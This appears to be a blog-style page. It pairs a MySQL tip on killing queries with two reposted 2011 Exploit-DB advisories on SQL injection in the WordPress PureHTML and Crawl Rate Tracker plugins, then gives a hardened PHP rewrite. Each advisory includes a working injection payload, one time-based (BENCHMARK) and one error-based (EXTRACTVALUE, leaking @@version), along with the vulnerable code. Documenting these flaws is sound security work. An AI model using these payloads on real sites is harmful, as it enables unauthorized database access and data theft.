How to kill queries on MySQL

  1. Log in to the database.
  2. Run the command: show full processlist;
  3. This lists each process ID with its status and the query itself, so you can see which one is causing the database to hang.
  4. Select that process ID and run: KILL <pid>;
  5. At that point the process is killed.

Sometimes killing each process manually is not enough, so we have to use a trick. Here it is:

  1. Log in to MySQL.
  2. Run this query: select concat('KILL ',id,';') from information_schema.processlist where user='user';
  3. This prints every matching process as a KILL command.
  4. Copy the whole query result, remove the pipe (|) signs, and paste it back into the query console. Hit ENTER. Boom, it's done.

WordPress PureHTML plugin



# Exploit Title: WordPress PureHTML plugin <= 1.0.0 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip
# Version: 1.0.0 (tested)
# Note: magic_quotes has to be turned off

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/pure-html/alter.php
PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(!isset($_POST['PureHTMLNOnce'])){
if ( !wp_verify_nonce( $_POST['PureHTMLNOnce'], plugin_basename(__FILE__) )) {header("location:".$refer);}
}
else{
...
if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
...
$action = $_POST['action'];

#delete
if($action == "delete"){
$sql = "delete from ".$wpdb->prefix."pureHTML_functions WHERE id='".$id."'";
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)

Source: http://www.exploit-db.com/exploits/17758/

WordPress Crawl Rate Tracker plugin



# Exploit Title: WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip
# Version: 2.0.2 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20

---------------
Vulnerable code
---------------
class b3_chartData extends b3_sbTrackingConfig {
public function tracking_bot_report_chart_data() {
...
if($_GET['page_url'] != '') {
$bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table WHERE `visit_time` >= '$start' AND `visit_time` <= '$end' AND `page_url` = '" . $_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`");
...
if ($_GET['chart_data']==1) {
...
$chartData = new b3_chartData();
echo $chartData->tracking_bot_report_chart_data();

Source: http://www.exploit-db.com/exploits/17755/
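
The hardened form of the two queries quoted in the PureHTML and Crawl Rate Tracker advisories above, as an added example (not the plugins' code and not part of the advisories): request values are bound through `$wpdb->prepare()` placeholders instead of being concatenated into the SQL string. The function names, the nonce action `purehtml_alter`, the `manage_options` capability, the numeric `id` and the integer timestamps are assumptions, and the code expects to run inside a loaded WordPress.

```php
<?php
// Added example; assumes a loaded WordPress ($wpdb and helpers available).
// Function names, nonce action and capability are hypothetical.

function purehtml_delete_function() {
    global $wpdb;

    // Reject the request unless the nonce is present AND valid. The quoted
    // code only called wp_verify_nonce() when the field was missing.
    if ( ! isset( $_POST['PureHTMLNOnce'] )
        || ! wp_verify_nonce( $_POST['PureHTMLNOnce'], 'purehtml_alter' )
        || ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }

    // Assumption: id is a numeric key, so force it to a non-negative integer.
    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;

    // prepare() escapes only what is passed for a placeholder; the SQL
    // text itself must contain no request data.
    return $wpdb->query( $wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}pureHTML_functions WHERE id = %d",
        $id
    ) );
}

// $table comes from plugin configuration, never from the request.
// Assumption: $start and $end are Unix timestamps, as FROM_UNIXTIME() suggests.
function crawlrate_bot_report( $table, $start, $end, $page_url ) {
    global $wpdb;

    return $wpdb->get_results( $wpdb->prepare(
        "SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,
                `robot_name`, COUNT(*) `total`
           FROM `{$table}`
          WHERE `visit_time` >= %d AND `visit_time` <= %d
            AND `page_url` = %s
          GROUP BY `visit_date`, `robot_name`",
        (int) $start, (int) $end, (string) $page_url
    ) );
}
```

Bound this way, the `id` and `page_url` values reach MySQL as an integer and an escaped string literal rather than as SQL syntax.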